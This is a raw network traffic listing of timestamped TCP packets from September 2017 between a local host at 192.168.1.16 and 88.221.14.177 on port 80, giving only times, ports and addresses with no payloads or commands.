Sep 12, 2017 22:18:59.224559069 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.224728107 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.261600971 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.261629105 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.261642933 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.261791945 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.263701916 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.263735056 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.263744116 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.264005899 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.264097929 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.264116049 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.264125109 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.264614105 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.301367044 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.301579952 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.319139957 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.319166899 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.319175959 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.319312096 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.334259033 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.334291935 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.334300995 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.334405899 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.349183083 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.349210978 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.349224091 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.349328995 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.373357058 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.373387098 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.373399019 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.373563051 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.409559965 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.409677982 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.453402042 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.453432083 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.453453064 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.453536987 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.453876019 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.456229925 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.456254959 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.456264973 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.456391096 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.463634968 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.463738918 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.463748932 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.463871002 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.464572906 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.493294001 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.493326902 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.493352890 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.493494987 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.495053053 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.495246887 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.495347977 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.495368004 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.495381117 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.495826006 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.533144951 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.533170938 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.533179998 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.533308983 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.543298960 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.543329000 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.543350935 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.543668032 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.544343948 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.544373989 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.544385910 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.544501066 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.573311090 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.573898077 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.576323986 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.576343060 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.576353073 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.576500893 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.582227945 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.582252026 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.582273960 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.582535982 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.582561016 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.582636118 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.582663059 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.583551884 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.613399982 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.613806009 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.654297113 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.654324055 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.654355049 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.654599905 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.693118095 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.693864107 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.718696117 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.718717098 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.718744040 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.718832970 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.749699116 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.749736071 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.749752998 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.749836922 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.750194073 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.757266998 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.757292032 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.757303953 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.757440090 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.757860899 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.757882118 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.757899046 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.758002996 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.788886070 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.789002895 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.861700058 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.861732960 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.861763000 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.861805916 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.862448931 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.893986940 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.894020081 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.894036055 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.894220114 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.903764963 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.903793097 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.903815985 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.903840065 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.903944969 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.903996944 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.932928085 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.932955027 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.932987928 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.933134079 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.965039015 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.965101957 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.974832058 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.975085974 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.975322962 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.975349903 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.975358963 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.975521088 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.009087086 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.009119034 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.009129047 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.009288073 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.012936115 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.012967110 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.012985945 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.013133049 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.014465094 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.014493942 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.014503002 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.014662027 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.026563883 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.049632072 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.049899101 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.093599081 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.093636036 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.093651056 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.093786955 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.121568918 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.121609926 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.121629000 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.121763945 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.131072998 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.131105900 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.131119013 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.131221056 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.153398991 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.153433084 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.153448105 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.153553963 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.162209034 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.162314892 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.162761927 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.162796021 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.162805080 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.162895918 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.173010111 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.173043966 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.173068047 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.173224926 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.187433004 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.187459946 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.187468052 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.187516928 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.194072962 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.194257021 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.218034029 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.218072891 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.218081951 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.218198061 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.225565910 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.225687027 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.259975910 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.260005951 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.260020971 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.260181904 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.297434092 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.297468901 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.297486067 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.297597885 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.300465107 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.300503969 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.300518036 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.300601959 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.329945087 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.329982996 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.329997063 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.330096006 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.363334894 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.363518953 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.365005970 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.365040064 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.365052938 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.365159988 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.369208097 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.369242907 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.369256020 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.369303942 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.369613886 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.409811974 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.409842014 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.409868956 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.410006046 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.466849089 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.490473986 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.490521908 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.490534067 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.490756989 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.491677046 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.491842985 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.491908073 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.491931915 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.491941929 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.492038012 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.492117882 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.492135048 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.492144108 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.492257118 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.492269993 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.492417097 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.492451906 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.493659019 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.523065090 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.523575068 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.527827978 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.527873993 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.527883053 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.528259039 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.539469957 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.539577007 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.545295954 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.547158957 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.547199965 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.547214985 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.547311068 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.578264952 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.578304052 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.578318119 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.578490019 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.602436066 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.602499962 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.602510929 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.602679968 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.618700981 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.618757010 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.618781090 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.618911028 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.635771990 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.636204958 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.637371063 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.637403965 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.637419939 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.637527943 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.641845942 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.641880989 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.641896963 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.642044067 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.668591022 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.668618917 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.668633938 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.668704033 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.668734074 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.668756962 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.668770075 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.668821096 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.673051119 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.673455000 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.754837990 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.754885912 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.754904985 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.755014896 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.801476002 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.801516056 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.801526070 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.801599026 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.807497025 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.807512999 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.807523966 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.807596922 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.905205011 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.905255079 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.905267000 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.905479908 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.905527115 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.905637980 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.907893896 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.907923937 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.907933950 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.908014059 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.941576004 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.941622972 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.941632032 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.941864967 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.944617033 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.944654942 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.944667101 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.944782019 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.944798946 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.944924116 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.944969893 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.945748091 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.973757029 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.973995924 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:19:00.975883007 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.975908041 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.975914001 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:19:00.976067066 MESZ	49201	80	192.168.1.16	88.221.14.177
